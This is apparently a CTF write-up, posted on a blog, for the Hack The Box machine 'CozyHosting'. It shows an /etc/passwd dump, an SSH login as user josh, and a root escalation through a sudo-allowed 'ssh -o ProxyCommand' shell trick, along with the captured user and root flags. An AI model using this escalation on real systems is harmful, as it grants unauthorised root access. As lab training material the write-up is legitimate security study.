    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    pollinate:x:105:1::/var/cache/pollinate:/bin/false
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
    syslog:x:107:113::/home/syslog:/usr/sbin/nologin
    uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
    tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
    tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
    landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
    fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
    usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
    lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
    app:x:1001:1001::/home/app:/bin/sh
    postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    josh:x:1003:1003::/home/josh:/usr/bin/bash
    _laurel:x:998:998::/var/log/laurel:/bin/false
    app@cozyhosting:/app$ 
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63

    User flag:

    633400af01adcc71fd0a9174a813847c

    ┌──(kwkl㉿kwkl)-[~]
    └─$ ssh josh@10.10.11.230     
    The authenticity of host '10.10.11.230 (10.10.11.230)' can't be established.
    ECDSA key fingerprint is SHA256:dHlbSOhuGjzTNgvvNbEe2LXI3SsauTGXC/Y5kWTJKs4.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.11.230' (ECDSA) to the list of known hosts.
    josh@10.10.11.230's password: 
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
      System information as of Mon Oct  2 03:32:14 AM UTC 2023
    
      System load:           0.0
      Usage of /:            53.2% of 5.42GB
      Memory usage:          13%
      Swap usage:            0%
      Processes:             239
      Users logged in:       0
      IPv4 address for eth0: 10.10.11.230
      IPv6 address for eth0: dead:beef::250:56ff:feb9:63e0
    
    
    Expanded Security Maintenance for Applications is not enabled.
    
    0 updates can be applied immediately.
    
    Enable ESM Apps to receive additional future security updates.
    See https://ubuntu.com/esm or run: sudo pro status
    
    
    The list of available updates is more than a week old.
    To check for new updates run: sudo apt update
    
    Last login: Tue Aug 29 09:03:34 2023 from 10.10.14.41
    josh@cozyhosting:~$ ls
    user.txt
    josh@cozyhosting:~$ id
    uid=1003(josh) gid=1003(josh) groups=1003(josh)
    josh@cozyhosting:~$ cat user.txt
    633400af01adcc71fd0a9174a813847c
    josh@cozyhosting:~$ 
    
    josh@cozyhosting:~$ sudo -l
    [sudo] password for josh: 
    Sorry, try again.
    [sudo] password for josh: 
    Matching Defaults entries for josh on localhost:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
    
    User josh may run the following commands on localhost:
        (root) /usr/bin/ssh *
    josh@cozyhosting:~$ 
    
    
    josh@cozyhosting:~$ sudo -l
    [sudo] password for josh: 
    Sorry, try again.
    [sudo] password for josh: 
    Matching Defaults entries for josh on localhost:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
    
    User josh may run the following commands on localhost:
        (root) /usr/bin/ssh *
    josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
    # 
    # 
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # cat /root/root.txt
    f1714bfee126c2c7107a6ae26fb22b7d
    # 
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63
    • 64
    • 65
    • 66
    • 67
    • 68
    • 69
    • 70
    • 71
    • 72
    • 73
    • 74
    • 75

    Root flag:f1714bfee126c2c7107a6ae26fb22b7d

  • 相关阅读:
    华为机试真题 Java 实现【等和子数组最小和】【2022.11 Q4新题】
    nvm管理node版本 nodenpm不是内部或外部命令,也不是可运行的程序
    SpringBoot——自定义start
    oracle启动与关闭
    基于无线通信模块对焦炉发讯装置的设计
    APISpace接口推荐
    [附源码]计算机毕业设计疫情防控平台Springboot程序
    树莓派交叉编译USB转网卡驱动_incomplete
    iOS 判断触摸位置是否在图片的透明区域
    从0开始深入理解并发、线程与等待通知机制(中)
  • 原文地址:https://blog.csdn.net/m0_47210241/article/details/133487936